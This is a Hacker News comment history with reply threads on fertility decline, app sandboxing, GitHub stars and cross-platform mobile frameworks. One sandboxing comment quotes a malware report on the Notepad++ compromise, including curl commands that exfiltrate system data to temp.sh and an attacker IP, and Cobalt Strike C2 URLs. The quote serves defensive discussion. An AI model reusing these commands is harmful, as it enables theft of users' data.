Hacker Newsnew | past | comments | ask | show | jobs | submit | ashishb's commentslogin

New Yorker has a detailed article on this phenomenon that's a great read.

It busts many common myths.

https://www.newyorker.com/magazine/2025/03/03/the-population...


What are some of the myths they bust in that article? For those of us who can't see past the paywall

One really common that myth this article busts is about child care.

"Child care is virtually free in Vienna and extremely expensive in Zurich, but the Austrians and the Swiss have the same fertility rate."


Childcare can be nice to have but it can also be a full-time job just getting the kids there if you have more than a few.

We certainly take advantage of things like free preschool; but if we look at it objectively (and ignore benefits to the child) it consumes more time than if we didn't use it - getting him ready, walking him to school, picking him up, etc. Since it's free, we look at "time spent" and it's something like 2-3 hours spent to "get" 3 hours.


Minus the commute you had to do most of that anyway though, right? We get my four year old ready and walk her to school (city free pre-k a few blocks away, plus paid aftercare).

It takes about an hour to get breakfasted, dressed, and ready which we would be doing anyway. Counting the walk both ways it's about 30 minutes of extra time for 8 hours of childcare.

Unless your commute is just huge I can't see that math being true.


You got 8 hours out of it, we get maybe three - because of how it works out.

Add in infants and toddlers, and the fact that many places seem to do childcare for a very particular age range, and it can get hectic.

Workable, of course, anything is, but hectic. It can be understandable why people look at it from the outside and say "wow, that's a lot of kids, too many for me."


Yeah, haha fair. Even my friends with two look noticeably shell shocked most of the time. Good luck =)

Two kids are exponentially harder than one. Apparently it gets easier with three, but definitely not worth checking that out.

I don’t think the evidence either way is strong enough to call that one a myth. There are lots of other differences between the two countries that could offset the impact of Austria’s childcare subsidies.

There are plenty of longitudinal studies from various geographies, which I would summarize as “childcare subsidies increase birth rates in some contexts, but the effects are complex and depend on program specifics.” E.g. https://pmc.ncbi.nlm.nih.gov/articles/PMC2917182/ and https://clef.uwaterloo.ca/wp-content/uploads/2024/09/CLEF-07...


Just to expand a bit on Zurich and comparing with Slovenia (another "very socialist" country).

Childcare in/around Zurich is (was 2 years ago) 2500 - 3000 CHF / month (lower prices after ~18 months). This is and isn't expensive. The list prices are high, but so are salaries (and taxes are low), and this is cheaper than rent (for 1 kid). Not subsidized.

In Slovenia, the full price is about 700 EUR / month, subsidised up to 77% by the government (i.e. by high-earners, effectively a double-progressive taxation with already high taxes).

What you get for that price in Zurich? A lot! Kindergarten starts at 3 months and can take care of kids for the whole work day (7am-18pm). Groups are tiny and lots of teachers - 3 adults per 12 kids. Groups are mixed age as well, which I think are preferable. You also get a lot of flexibility - e.g. half-days (cheaper) or only specific days per week (e.g. Mon-Thu). Jobs are equally adaptable, a lot of people work 80% (so Friday free, spend with kid(s)).

In Slovenia, the situation is much worse. 2 teachers per 12 or even 20 kids (after age 4), age-stratified groups, childcare finishes at 5pm (but start at 6am, if someone needs that...). Children are only welcome after 11 months of age. No flexibility at all. This is all for public childcare - we also looked at private, but generally you pay more (1000+ EUR) but get ... not much more. Maybe nicer building (not even), but groups are equally large (IMO biggest drawback).

So as far as childcare is concerned, Switzerland is IMO much better.

But where Switzerland fucks you, is elsewhere. As mentioned, tax is low, so that's a plus. But there's minimal maternity leave (hence kindergarten starts at 3 months). If women can, they take more time off work, but not everyone can. What I wrote above about "kindergarten" only applies until 4 years of age, after which "preschool" starts, which is government-funded and hence free. Well, "free". It ends at 12pm after which you need to move your kid back into private childcare if you have a job. After that, school starts, which has a lunch break around 12pm as well - children are supposed to eat lunch at home - which again isn't really compatible with 2 working parents.

I'm not in Switzerland any more so I don't know how people actually manage when kids start school...


In the USA there's a definite "kid gap" around 4k-1st grade - before that, childcare if used is "open late" and flexible (if you have the cash) - and after 1st the kid is often mature enough to do simple movements on their own if school doesn't go long enough (walk to the library, or get into extra curricular activities, etc).

At 4k-1st you often have shortened hours, so if you're a working parent you need to arrange for transportation or be able to take long lunches, etc to move children from one place to another.

This "gap of annoyance" happens right about when you'd naturally be looking at a second or third kid as a possibility - I wonder how much effect it has on people.


I can only speak for myself, but 2 was a good number for me. This amounts to somewhat less than a replacement rate. My wife and I had enough time and energy to give the kids what they needed, and still have some for ourselves at the end of the day. And if either of the kids needed extra resources or attention, we were able to do it without neglecting the other one.

I am not worried about a population decline, to be honest. Even disregarding AI, improvements in technology and food production mean we can leverage resources in a way that would seem like magic to the people alive when my grandparents were born. I would rather take care of the people we have in this world - the whole world, not just my country - than see more people born into slums and poverty.

Even if there is a cliff, I don't think it's an existential crisis. I say without irony, I believe the market will adjust. Wages will go up in jobs that are needed, and workers will have more leverage and more mobility, socially and geographically. It's hard for me to see that as a bad thing.

Even if you believe that technology will let us keep pushing the earth's carrying capacity indefinitely, to what end? It doesn't seem like anyone has a real plan for expanding beyond 8 billion that isn't just a promise that we'll figure it out when we get there. We aren't taking care of the people we have now. Never mind the ones yet to be born.

I don't want to live in Brave New World and I also don't want to live in The Dosadi Experiment. And I don't want to condemn the future people to live like that either. I know those are works of fiction, but both seem plausible (in the general sense) at this point.

(Edit: not Brave New World. I am thinking about a story where people lived in dense arcologies with tight surveillance and social control surrounded by robotic farms. Sorry I can't remember.)


TL;DR: the article argues we cannot fix the population crisis with small tax breaks or traditional values because the modern world has made the cost of raising a child being too high for most people to want to try.

---

The article argues that the global drop in birth rates isn’t a moral failure or a biological accident, but a logical response to the pressures of modern life.

1. Myth: People are too selfish/liberal to have kids.

Reality: It’s not about hedonism. Instead, people are avoiding parenthood because the life has become such a grind. In places like Korea, young people feel that bringing a child into such a hyper-competitive, expensive world is unfair to the child.

2. Myth: It’s a biological problem (low testosterone/chemicals).

Reality: There is no evidence that people can’t have kids physically. The issue is a lack of desire. It is a social and economic choice, not a medical one.

3. Myth: Women working is the cause.

Reality: Data show birth rates are actually higher in countries where women have more jobs and support. In countries where women stay home more (like parts of India), birth rates are still crashing. Work isn't the enemy; lack of support is.

4. Myth: Immigrants will replace the population.

Reality: Newcomers quickly adopt the habits of their new country. Within one generation, immigrant birth rates drop to match everyone else’s.

5. Myth: The government can just pay people to have babies.

Reality: South Korea spent $280 billion on this effort and the birth rate still hit record lows. Cash doesn't work if the overall culture is too stressful and the difference in culture between men and women remains fixated on old roles.

e: moved TL;DR to the top.


> lack of support is

This is the key - but "support" often gets converted by the modern world into dollars - but there's no rational way to pay someone else to be the parent.

You need support to be much more than just monetary payments - nobody would think you're "supporting" someone going through a mental crisis or drug addiction by giving them a giant ball of cash; it might HELP in some way, but it's not really the totality of support.

Anyway if someone wants to send me a small portion of $280 billion I'll have more kids, you can even get pictures of them now and then! Looking to adopt rich grandparents ;)


> 4. Myth: Immigrants will replace the population.

> Reality: Newcomers quickly adopt the habits of their new country. Within one generation, immigrant birth rates drop to match everyone else’s.

That doesn't address the "myth". You can keep bringing more migrants and eventually replace the population.



I am at work and didn't have time to read the full article. Here's Gemini summary:

The article "The End of Children" (published in The New Yorker, March 2025) explores the global phenomenon of plummeting fertility rates, examining why traditional explanations and policy solutions are failing to reverse the trend. Here is a summary of the key points: * Economic Support Isn't Enough: The article challenges the popular liberal argument that fertility decline is primarily caused by economic insecurity or a lack of childcare. It points out that Nordic countries like Finland and Sweden—which offer generous parental leave, "baby boxes," and flexible work cultures—still face declining birth rates similar to or lower than the U.S. Even in places where childcare is free (Vienna) versus expensive (Zurich), fertility rates often remain identical. * The "Achievement Culture" Trap: The definition of "affording" a child has inflated significantly. In many wealthy, educated circles, raising a child now implies providing a suite of expensive advantages—individual bedrooms, travel sports, private lessons, and organic diets. This "intensive parenting" model means working mothers today actually spend more time on active childcare than stay-at-home mothers did in previous generations, making the prospect of parenthood feel overwhelming. * Political and Educational polarization: There is a widening fertility gap based on politics and education. Democrats and those with higher degrees are significantly more likely to be childless. This is partly attributed to the extended time required for education and career establishment, pushing childbearing to later years when it is biologically more difficult. * Failed Government Interventions: The author highlights various aggressive attempts by governments to boost birth rates, such as Hungary's tax exemptions for mothers of four and South Korea's numerous "happiness projects" and subsidies. Despite spending fortunes, no modern nation has successfully reversed a low fertility rate back to replacement levels. * A Shift in Meaning: The article concludes with a philosophical reflection on how children have transformed from a natural part of life into "variables" in a high-stakes lifestyle choice. They are increasingly viewed through the lens of identity and personal fulfillment, leading to a culture where parents fear judgment and non-parents fear being seen as selfish, intensifying the anxiety around having children at all.


Wow, I never thought id see the day on HN.....


I ended up writing my own sandbox so that it works on Mac OS as well and can be used for other tools (but just AI agents) as well

https://github.com/ashishb/amazing-sandbox


Curious to know what made you DIY this?


Tell me a better alternative that allows me to run, say, 'markdown lint', an npm package, on the current directory without giving access to the full system on Mac OS?


sandbox-exec -f curr_dir_access_profile.sb markdownlint


So you have to install npm package markdownlint on your machine and let it run it's potentially dangerous postinstall step?


You can customize curr_dir_access_profile.sb to block access to network/fs/etc. Why is this not enough?


Some tools do require Internet access.

Further, I don't even want to take the risk of running 'npm install markdownlint' anymore on my machine.


I understand the concern. However, you can customize the profile (e.g., allowlist) to only allow network access to required domains. Also, looks like your sandboxing solution is Docker based, which uses VMs on a Mac machine, but will not use VMs on a Linux machine (weak security).


That's why I wrote my own sandbox. Everyone hand waives these concerns.

Further, I don't know why docker is weak security on Linux. Are you telling me that one can exploit docker?


dockerd is a massive root-privileged daemon just sitting there, waiting for its moment. For local dev it’s often just unnecessary attack surface - one subtle kernel bug or namespace flaw, and it’s "hello, container escape". bwrap is much more honest in that regard: it’s just a syscall with no background processes and zero required privileges. If an agent tries to break out, it has to hit the kernel head-on instead of hunting for holes in a bloated docker API


then use podman instead.


I am running a lot of tools inside sandbox now for exactly this reason. The damage is confined to the directory I'm running that tool in.

There is no reason for a tool to implicitly access my mounted cloud drive directory and browser cookies data.


MacOS has been getting a lot of flak recently for (correct) UI reasons, but I honestly feel like they're the closest to the money with granular app permissions.

Linux people are very resistant to this, but the future is going to be sandboxed iOS style apps. Not because OS vendors want to control what apps do, but because users do. If the FOSS community continues to ignore proper security sandboxing and distribution of end user applications, then it will just end up entirely centralised in one of the big tech companies, as it already is on iOS and macOS by Apple.


It also has persistent permissions.

Think about it from a real world perspective.

I knock on your door. You invite me to sit with you in your living room. I can't easily sneak into your bed room. Further, your temporary access ends as soon as you exit my house.

The same should happen with apps.

When I run 'notepad dir1/file1.txt', the package should not sneakily be able to access dir2. Further, as soon as I exit the process, the permission to access dir1 should end as well.


A better example would be requiring the mailman to obtain written permission to step on your property every day. Convenience trumps maximal security for most people.


The early version of UAC in Windows did that…

Asking continuously is worse than not asking at all…


Some of the stuff that I install is actually meant to behave like malware.

But fine lock windows down for normal users as long as I can still disable all the security. We don't need another Apple.


I would configure mailman with permanent write access to the mailbox area

That's what I with my sandbox right now


With systemd or firejail it's quite easy to do this sort of thing on linux.


Attempt at real life version (starts with idea they are actually not trustworthy)

  - You invite someone to sit in your living room
    - There must have been a reason to begin with (or why invite them at all)
    - Implied (at least limited) trust of whoever was invited
  - Access enabled and information gained heavily depends on house design
    - May have to walk past many rooms to finally reach the living room
    - Significant chances to look at everything in your house
    - Already allows skilled appraiser to evaluate your theft worthiness
  - Many techniques may allow further access to your house
    - Similar to digital version (leave something behind)
      - Small digital object accessing home network
      - "Sorry, I left something, mind if I search around?"
    - Longer con (advance to next stage of "friendship" / "relationship", implied trust)
      - "We should hang out again / have a cards night / go drinking together / ect..."
      - Flattery "Such a beautiful house, I like / am a fan of <madlibs>, could you show it to me?"
  - Already provides a survey of your home security
    - Do you lock your doors / windows?
    - What kind / brand / style do you have?
    - Do you tend to just leave stuff open?
    - Do you have onsite cameras or other features?
    - Do you easily just let anybody into your house who asks?
    - General cleanliness and attention to security issues

  - In the case of Notepad++, they would also be offering you a free product
    - Significant utility vs alternatives
    - Free
    - Highly recommended by many other "neighbors"
  - In the case of Notepad++, they themselves are not actively malicious (or at least not known to be)
    - Single developer
    - Apparently frazzled and overworked by the experience
    - Makes updates they can, yet also support a free product for millions.
    - It doesn't really work with the friend you invite in scenario (more like they sneezed in your living room or something)


> When I run 'notepad dir1/file1.txt', the package should not sneakily be able to access dir2.

What happens if the user presses ^O, expecting a file open dialog that could navigate to other directories? Would the dialog be somehow integrated to the OS and run with higher permissions, and then notepad is given permissions to the other directory that the user selects?


Pretty sure that’s how it works on iOS. The app can only access its own sandboxed directory. If it wants anything else, it has to use a system provided file picker that provides a security scoped url for the selected file.


It's also how it works on macOS and even on modern Windows if you are running sandboxed apps.


Yes, UIDocumentPickerViewController is 10+ years old at this point.

There’s also a similar photos picker (PHPicker) which is especially good from 2023 on. Signal uses this for instance.


> Linux people are very resistant to this

Because security people often does not know the balance between security and usability, and we end up with software that is crippled and annoying to use.


I think we could get a lot further if we implement proper capability based security. Meaning that the authority to perform actions follows the objects around. I think that is how we get powerful tools and freedom, but still address the security issues and actually achieve the principle of least privilege.

For FreeBSD there is capsicum, but it seems a bit inflexible to me. Would love to see more experiments on Linux and the BSDs for this.


FreeBSD used to have an ELF target called "CloudABI" which used Capsicum by default. Parameters to a CloudABI program were passed in a YAML file to a launcher that acquired what was in practice the program's "entitlements"/"app permissions" as capabilities that it passed to the program when it started.

I had been thinking of a way to avoid the CloudABI launcher. The entitlements would instead be in the binary object file, and only reference command-line parameters and system paths. I have also thought of an elaborate scheme with local code signing to verify that only user/admin-approved entitlements get lifted to capabilities.

However, CloudABI got discontinued in favour of WebAssembly (and I got side-tracked...)

Redox is also moving towards having capabilities mapped to fd's, somewhat like Capsicum. Their recent presentation at FOSDEM: https://fosdem.org/2026/schedule/event/KSK9RB-capability-bas...


Seems like a bad time to bring this up when it wouldn't have helped with this attack at all.


A capability model wouldn't have prevented the compromised binary from being installed, but it would totally prevent that compromised binary from being able to read or write to any specific file (or any other system resource) that Notepad++ wouldn't have ordinarily had access to.


Eli5, what is that supposed to mean?


The original model of computer security is "anything running on the machine can do and touch anything it wants to".

A slightly more advanced model, which is the default for OSes today, is to have a notion of a "user", and then you grant certain permissions to a user. For example, for something like Unix, you have the read/write/execute permissions on files that differ for each user. The security mentioned above just involves defining more such permissions than were historically provided by Unix.

But the holy grail of security models is called "capability-based security", which is above and beyond what any current popular OS provides. Rather than the current model which just involves talking about what a process can do (the verbs of the system), a capability involves taking about what a process can do an operation on (the nouns of the system). A "capability" is an unforgeable cryptographic token, managed by the OS itself (sort of like how a typical OS tracks file handles), which grants access to a certain object.

Crucially, this then allows processes to delegate tasks to other processes in a secure way. Because tokens are cryptographically unforgeable, the only way that a process could have possibly gotten the permission to operate on a resource is if it were delegated that permission by some other process. And when delegating, processes can further lock down a capability, e.g. by turning it from read/write to read-only, or they can e.g. completely give up a capability and pass ownership to the other process, etc.

https://en.wikipedia.org/wiki/Capability-based_security


> Linux people are very resistant to this, but the future is going to be sandboxed iOS style apps.

Linux people are NOT resistant to this. Atomic desktops are picking up momentum and people are screaming for it. Snaps, flatpaks, appimages, etc. are all moving in that direction.

As for plain development, sadly, the OS developers are simply ignoring the people asking. See:

https://github.com/containers/toolbox/issues/183

https://github.com/containers/toolbox/issues/348

https://github.com/containers/toolbox/issues/1470

I'll leave it up to you to speculate why.

Perhaps getting a bit of black eye and some negative attention from the Great Orange Website(tm) can light a fire under some folks.


Yet we look at phones, and we see people accepting outrageous permissions for many apps: They might rely on snooping into you for ads, or anything else, and yet the apps sell, and have no problem staying in stores.

So when it's all said and done, I do not expect practical levels of actual isolation to be that great.


> Yet we look at phones, and we see people accepting outrageous permissions for many apps

The data doesn't support the suggestion that this is happening on any mass scale. When Apple made app tracking opt-in rather than opt-out in iOS 14 ("App Tracking Transparency"), 80-90% of users refused to give consent.

It does happen more when users are tricked (dare I say unlawfully defrauded?) into accepting, such as when installing Windows, when launching Edge for the first time, etc. This is why externally-imposed sandboxing is a superior model to Zuck's pinky promises.


In the case of iOS, the choice was to use the app with those permissions or without them, so of course people prefer to not opt-in - why would they?

But when the choice is between using the app with such spyware in it, or not using it at all, people do accept the outrageous permissions the spyware needs.


For all its other problems, App Store review prevents a lot of this: you have to explain why your app needs entitlements A, B and C, and they will reject your update if they don't think your explanation is good enough. It's not a perfect system, but iOS applications don't actually do all that much snooping.


Sand-boxing such as in Snap and Flatpak?


Snap and Flatpak do both sandboxing and package management.

You can use the underlying sandboxing with bwrap. A good alternative is firejail. They are quite easy to use.

I prefer to centralize package management to my distro, but I value their sandboxing efforts.

Personally, I think it's time to take sandboxing seriously. Supply chain attacks keep happening. Defense is depth is the way.


Notoriously not actually secure, at least in the case of Flatpak. (Can't speak to Snap)

Not sure how something can be called a sandbox without the actual box part. As Siri is to AI, Flatpak is to sandboxes.


I assumed the primary feature of Flatpak was to make a “universal” package across all Linux platforms. The security side of things seems to be a secondary consideration. I assume that the security aspect is now a much higher priority.


The XDG portal standards being developed to provide permissions to apps (and allow users to manage them), including those installed via Flatpak, will continue to be useful if and when the sandboxing security of Flatpaks are improved. (In fact, having the frontend management part in place is kind of a prerequisite to really enforcing a lot of restrictions on apps, lest they just stop working suddenly.)


Doesn't it use bwrap under the hood? what's wrong with that?


Many apps require unnecessarily broad permissions with Flatpak. Unlike Android and iOS apps they weren't designed for environments with limited permissions.


> Unlike Android

My experience with android apps seems to be different. Every other app seems to be asking for contacts or calling or access to files.


You can usually deny those. If they ask for them without a good reason, that's already suspicious.


It's truly perverse that, at the same time that desktop systems are trying to lock down what trusted, conventional native apps can and cannot do and/or access, you have the Chrome team pushing out proposals to expand what browsers allow websites to do to the user's file system, like silently/arbitrarily reading and writing to the user's disk—gated only behind a "Are you sure you want to allow this? Y/N"-style dialog that, for extremely good reasons, anyone with any sense about design and interaction has strongly opposed for the last 20+ years.


I intensely hate that a stupid application can modify .bashrc and permanently persist itself.

Sure, in theory, SELinux could prevent this. But seems like an uphill battle if my policies conflict with the distro’s. I’d also have to “absorb” their policies’ mental model first…


I tend to think things like .bashrc or .zshrc are bad ideas anyways. Not that you asked but I think the simpler solution is to have those files be owned by root and not writable by the user. You're probably not modifying them that often anyways.


> getting a lot of slack recently

I think you mean a lot of flak? Slack would kind of be the opposite.


Haha, yes, corrected. Thank you. I have a habit of fusing unrelated expressions.


Flatpak


I'm sure that will contribute to the illusion of security, but in reality the system is thoroughly backdoored on every level from the CPU on up, and everyone knows it.

There is no such thing as computer security, in general, at this point in history.


> but in reality the system is thoroughly backdoored on every level from the CPU on up, and everyone knows it.

Indeed. Why lock your car door as anyone can unlock and steal it by learning lock-picking?


Residents of San Francisco ask themselves that question all the time.


There's a subtlety that's missing here: if your threat model doesn't include the actors who can access those backdoors, then computer security isn't so bad these days.

That subtlety is important because it explains how the backdoors have snuck in — most people feel safe because they are not targeted, so there's no hue and cry.


The backdoors snuck in because literally everyone is being targeted. Few people ever see the impact of that themselves or understand the chain of events that brought those impacts about.


And yet, many people perceive a difference between “getting hacked” and “not getting hacked” and believe that certain precautions materially affect whether or not they end up having to deal with a hacking event.

Are they wrong? Do gradations of vulnerability exist? Is there only one threat model, “you’re already screwed and nothing matters”?


I'm sure you're right; however, there is still a distinction between the state using my device against me and unaffiliated or foreign states using my device against me or more likely simply to generate cash for themselves.

It's still worth solving one of these problems.


A distinction without a difference. One mafia is as bad as another. One screws you in the short term, the other screws you in the long term, and much worse.

The problem in both cases is the massive attack surface at every level of the system. Most of these proposals about "security" are just rearranging deckchairs on the Titanic.

If you can't keep a nation state out (and you're referring to your own state, right?) then you can't keep a lone wolf hacker out either, because in either case that's who's doing the work.


I almost feel like this should just be the default action for all applications. I don't need them to escape out of a defined root. It's almost like your documents and application are effectively locked together. You have to give permissions for an app to extra data from outside of the sandbox.

Linux has this capability, of course. And it seems like MacOS prompts me a lot for "such and such application wants to access this or that". But I think it could be a lot more fine-grained, personally.


I've been arguing for this for years. There's no reason every random binary should have unfettered, invisible access to everything on my computer as if it were me.

iOS and Android both implement these security policies correctly. Why can't desktop operating systems?


The short answer is tech debt. The major mobile OSes got to build a new third party software platform from day 0 in the late 2000s, one which focused on and enforced priorities around power consumption and application sandboxing from the getgo etc.

The most popular desktop OSes have decades of pre-existing software and APIs to support and, like a lot of old software, the debt of choices made a long time ago that are now hard/expensive to put right.

The major desktop OSes are to some degree moving in this direction now (note the ever increasing presence of security prompts when opening "things" on macOS etc etc), but absent a clean sheet approach abandoning all previous third party software like the mobile OSes got, this arguably can't happen easily over night.


Mobile platforms are entirely useless to me for exactly this reason, individual islands that don't interact to make anything more generally useful. I would never use any os that worked like that, it's for toys and disposable software only imo.


Mobile platforms are far more secure than desktop computing software. I'd rather do internet banking on my phone than on my computer. You should too.

We can make operating systems where the islands can interact. Its just needs to be opt in instead of opt out. A bad Notepad++ update shouldn't be able to invisibly read all of thunderbird's stored emails, or add backdoors to projects I'm working on or cryptolocker my documents. At least not without my say so.

I get that permission prompts are annoying. There are some ways to do the UI aspect in a better way - like have the open file dialogue box automatically pass along permissions to the opened file. But these are the minority of cases. Most programs only need to access to their own stuff. Having an OS confirmation for the few applications that need to escape their island would be a much better default. Still allow all the software we use today, but block a great many of these attacks.


Both are true, and both should be allowed to exist as they serve different purposes.

Sound engineers don't use lossy formats such as MP3 when making edits in preproduction work, as its intended for end users and would degrade quality cumulatively. In the same way someone working on software shouldn't be required to use an end-user consumption system when they are at work.

It would be unfortunate to see the nuance missed just because a system isn't 'new', it doesn't mean the system needs to be scrapped.


I mostly agree but ...

> In the same way someone working on software shouldn't be required to use an end-user consumption system when they are at work.

I'm worried that many software developers (including me, a lot of the time) will only enable security after exhausting all other options. So long as there's a big button labeled "Developer Mode" or "Run as Admin" which turns off all the best security features, I bet lots of software will require that to be enabled in order to work.

Apple has quite impressive frameworks for application sandboxing. Do any apps use them? Do those DAWs that sound engineers use run VST plugins in a sandbox? Or do they just dyld + call? I bet most of the time its the latter. And look at this Notepad++ attack. The attack would have been stopped dead if the update process validated digital signatures. But no, it was too hard so instead they got their users' computers hacked.

I'm a pragmatist. I want a useful, secure computing environment. Show me how to do that without annoying developers and I'm all in. But I worry that the only way a proper capability model would be used would be by going all in.


There is a middle ground (maybe even closer to more limited OS design principles) exist. It is not just toys. Otherwise neither UWP on Windows nor Flatpaks or Firejail would exist nor systemd would implement containerization features.

In such a scenario, you can launch your IDE from your application manager and then only give write access to specific folders for a project. The IDE's configuration files can also be stored in isolated directories. You can still access them with your file manager software or your terminal app which are "special" and need to be approved by you once (or for each update) as special. You may think "How do I even share my secrets like Git SSH keys?". Well that's why we need services like the SSH Agent or Freedesktop secret-storage-spec. Windows already has this btw as the secret vaults. They are there since at least Windows 7 maybe even Vista.


Windows has had this for over a decade, but no one wants to put their application in a sandbox.


If a sandbox is optional then it is not really a good sandbox

naturally even flatpak on Linux suffers from this as legacy software simply doesn’t have a concept of permission models and this cannot be bolted on after the fact


The containers are literally the "bolting on". You need to give the illusion of the software is running under a full OS but you can actually mount the system directories as read-only.


and you still need to mount volumes and add all sorts of holes in the sandbox for applications to work correctly and/or be useful

try to run gimp inside a container for example, you’ll have to give access to your ~/Pictures or whatever for it to be useful

Compared to some photo editing applications on android/iOS which can work without having filesystem access by getting the file through the OS file picker


What we need is a model similar to Google+ circles if anyone can remember that.

Basically a thing that I could assign 1) apps and 2) content to. Apps can access all content in all circles they are assigned to. Circles can overlap arbitrarily so you can do things like having apps A,B,C share access to documents X,Y but only A,B have access to Z etc.


And then there’s dbus…

Damn file protection not even enough…


They tried. And the rent seekers made a huge noise against


running apps in a sandbox is ok, but remember to disable internet access. A text editor should not require it, and can be used to exfiltrate the text(s) you're editing.

    When started, it sends a heartbeat containing system information to the attackers. This is done through the following steps:

    3 Then it uploads the 1.txt file to the temp[.]sh hosting service by executing the curl.exe -F "file=@1.txt" -s https://temp.sh/upload command;
    4 Next, it sends the URL to the uploaded 1.txt file by using the curl.exe --user-agent "https://temp.sh/ZMRKV/1.txt" -s http://45.76.155[.]202
--

    The Cobalt Strike Beacon payload is designed to communicate with the cdncheck.it[.]com C2 server. For instance, it uses the GET request URL https://45.77.31[.]210/api/update/v1 and the POST request URL https://45.77.31[.]210/api/FileUpload/submit.
--

    The second shellcode, which is stored in the middle of the file, is the one that is launched when ProShow.exe is started. It decrypts a Metasploit downloader payload that retrieves a Cobalt Strike Beacon shellcode from the URL https://45.77.31[.]210/users/admin


A sandbox in Windows? How?


Not what the OP is referring to, but UWP and successor apps were always sandboxed, from the time of Windows 8 onwards. This was derived from the Windows Mobile model, which in turn was emulating the Android/iOS app model.


https://learn.microsoft.com/en-us/windows/security/applicati...

Or the easier way with an external tool is using Sandboxie: https://sandboxie-plus.com/


The real lock-in is stars, not reliability [1].

They can have weekly outages, and the FOSS products would still be forced to be on GitHub.

1 - https://ashishb.net/tech/github-stars/


I have literally never looked at github stars as a measure of quality or had it affect my decision. I have looked at git logs, websites, issues, etc. But I would be genuinely worried if someone used github stars as an indication. So many honestly stupid projects have a lot of stars, and stellar ones have next to none.

https://github.com/EvanLi/Github-Ranking/blob/master/Top100/...

proof here. The top are taken by chinese educational repos. Elastic Search and Spring Boot are the only projects actually used by anyone in the top 10. But why would I trust the stars for spring boot over the fact its used in every java shop on the planet?


I don't rely on stars as the main signal of quality, but very low stars could stop me from looking into the things that I do use as a signal:

   - number of contributors
   - open issues
   - merged and unmerged PRs
   - commit history
   - the code
   - project governance
Some of these are also tied into GitHub rather than the git repo itself


The hacker News crowd has always these elitist takes

  - I don't look at GitHub Stars
  - I don't use Facebook
  - I am never persuaded by advertisement
  - I can build Dropbox over a weekend
Even if these are true, it is irrelevant. Hacker News is only a sliver of the tech world.


If I am sitting in a review session and the Engineer presenting brings up their options and why they are choosing to bring in technology A over B, and I ask them what their reasoning is. Being unsatisfied by "There are a lot of Github stars" Seems like an absolutely reasonable position to me. This is the equivalent of saying that something seems more true because it has a lot of facebook likes.


GitHub Stars are not a selection mechanism. They are filtering mechanism for most people.

Imagine someone is choosing between three FOSS projects - one has 90K stars, one has 30K and the thirdone has 1K.

In your meeting, the engineer will show you how he decided between the first and the second without even mentioning the third.


Good for you champ.


Another anecdote chiming in here. I've literally never paid attention to GitHub stars for anything important. Except if a repo of a big project has few stars I double check because I'm probably looking at a fork instead of the main repo.


I came to a similar conclusion - that GitHub benefits from a network effect similar to social media. I would really like to leave GitHub, but it's where stuff is happening. Any company seriously looking to replace GitHub should pay some attention the social network aspect of it.


> Any company seriously looking to replace GitHub should pay some attention the social network aspect of it.

Indeed. And I would say it is not just social signals but even non-social authority signals.

E.g. how many other projects depend on this projects and how many downloads happen for its artifacts.

You can see some of these on package registries like npm and pypi where their authority signals help people choose between the right libraries.


Very few people understand the depth of what you just said.

$2K or even $20K is meaningless for a parent making $100K or more.

Kids have a negative value to a professional class member.

If you engage in agriculture or some similar activity, a child as old as 10 can be a helping hand in some way or the other. No surprises that Amish farmers have a high birth rate.

https://ashishb.net/parenting/pregnancy/


It's not clear exactly what the number is, but if one observes individuals who manage to climb out of the low and middle classes and accrue a certain amount of wealth (somewhere in the ballpark of $600k-$1m net worth and up, maybe), pretty consistently not long after that achievement they've settled down and started a family.

I think for many the desire is there, but sufficient de-risking is required for them to be comfortable with acting upon it.


$600,000 net worth is nothing these days, I’m worth about that much after saving for 7 years and can’t even afford the mortgage for a $300,000 house, even if I put 20% down.

Investments are so much better at earning money than working for wages, in my case the amount of retirement savings I have after 7 years is larger than my cumulative earnings during the same period, and I’ve been saving about 40% of my gross income. Part of my net worth is ESOP equity that I can’t monetize in any way so that’s part of the reason why my net worth is higher than my earnings over the same period.


I think there's just not enough money in the county to induce more babies. The cost would be a shock. Anyone wealthy enough to shoulder the cost would fight so hard against it, it would never stand a chance. IMO the number is probably something like $10k per year per kid. Foster Care pays somewhere between 8k-12k.


There have been several iterations to have a unified way to build Android and iOS apps.

  - using HTML
  - using JavaScript
  - using JS+React
  - using Dart
  - using Kotlin
  - using Swift

This fundamentally does not work for anyone with more than 10M+ installs just like you can't write Mandarin and English in one script.

This only works for devs who over time churn out as their app fails or becomes too big [1]

1 - https://ashishb.net/tech/react-native/


   > This fundamentally does not work for anyone with more than 10M+ installs just like you can't write Mandarin and English in one script.
Provably false. My bank app (Nubank) is written in Flutter and it's one of the most used banks in Brazil (100mi+ clients who rely on the iPhone or Android app, since it's a digital bank with no web interface).


Good for you.

I meant as a general rule of thumb.


Genuinely curious: What does the number of installs have to do with anything? I didn't see anything about that in the linked post (which is brief, and only about React Native), and can't figure out how popularity of an app connects to which framework is used.

Would be interested to learn how this general rule of thumb works.


You said "fundamentally", not as a rule of thumb :)


Fair point. I should have said broadly.


> This fundamentally does not work for anyone with more than 10M+ installs just like you can't write Mandarin and English in one script.

Well, I did work on a Flutter app with a tiny team between 2018-2021 and we had 15M installs, were app of the day, got featured multiple times in the App Store, got Google’s design award, were a preloaded app on iPhones in Apple Stores in several countries, and were overall doing quite well.

It was a very focused app though, so the size of our codebase didn’t really grow with the number of installs.


In the short-term it can work.

Over time maintenance becomes hard

New iOS and Android features, sometimes backward-incompatible are introduced.

And now, you need your dependencies to implement them. Which might or might not happen. At best, this makes usage inferior. At worst, you can no longer publish an update in app stores.


This app was started in 2017 and it is still running today and making (way more modest than back then) revenue. It’s just that I don’t work on it anymore.


Goodnotes has tens of millions of monthly-active users (not just installs) and uses Swift WASM to run the same Swift code across iOS, Android, Windows, and web.


I mean, this is "fundamentally" wrong. Shopify for example continues to use React Native [0].

[0] https://shopify.engineering/five-years-of-react-native-at-sh...


6 months back I started dockerizing my setup after multiple npm vulnerabilities.

Then I wrote a small tool[1] to streamline my sandboxing.

Now, I run agents inside it for keeping my non-working-directory files safe.

For some tools like markdown linter, I run them without network access as well.

1- https://github.com/ashishb/amazing-sandbox


Very nice! Quite a coincidence, but the NPM disaster also prompted me to build litterbox.work as a possible solution. It is a very different approach though.


Why not just use the standard Linux tool bubblewrap?


The main reason is that in addition to sandboxing, I also wanted something similar to dev-containers where I can have a reproducible development environment. I guess that can also be achieved with Bubblewrap, but when you want to run containers anyway, it seems silly to not just use Podman.


Interesting project.

This won't work on Mac, right?


Unfortunately not since it is very much designed for Linux. I imagine it should work fine inside a Linux VM on Mac though.


Of course not. But it is not needed, as Mac users are not interested in data safety.


